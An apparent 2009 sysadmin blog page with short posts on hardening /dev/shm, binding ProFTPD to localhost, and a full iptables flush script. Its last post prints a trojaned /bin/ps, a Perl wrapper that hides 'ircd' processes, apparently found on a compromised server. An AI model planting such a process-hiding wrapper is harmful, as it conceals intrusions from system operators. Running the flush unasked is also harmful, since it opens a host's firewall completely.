December 2009

Securing /dev/shm

Edit your /etc/fstab:

# vi /etc/fstab

change:

none /dev/shm tmpfs defaults,rw 0 0

to

none /dev/shm tmpfs defaults,nosuid,noexec,rw 0 0

Remount /dev/shm:

# mount -o remount /dev/shm

You can test it runnig a script on /dev/shm, if you get “permission denied” it is fine!

Securing /dev/shm Read More »

ProFTP(D) – listen on single ip

I don’t use ftp, but wordpress comes with this nice feature to upgrade plugins automatically from the web admin interface that needs ftp.

the problem is I don’t want to enable the ftp service and make it available to the rest of the world just for that.

So I needs the following two options in proftpd.conf:

DefaultAddress 127.0.0.1
SocketBindTight on

Now restart proftpd and you’re done.

ProFTP(D) – listen on single ip Read More »

Iptables Flush

Full flush iptables script:

#!/bin/sh
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT

Iptables Flush Read More »

Bastard code. (1)

srv:/bin# cat ps
#!/usr/bin/perl
use warnings;
use strict;

my $string = $ARGV[0];
if($string){
my @net = qx/ps.old $string/;
my @hide = grep(!/(ircd)/, @net);
my @dd = grep(!/ps.old/, @hide);
print @dd;
}
else
{
my @nett = qx/ps.old/;
my @hidee = grep(!/(ircd)/, @nett);
my @d = grep(!/ps.old/, @hidee);
print @d;
}

Bastard code. (1) Read More »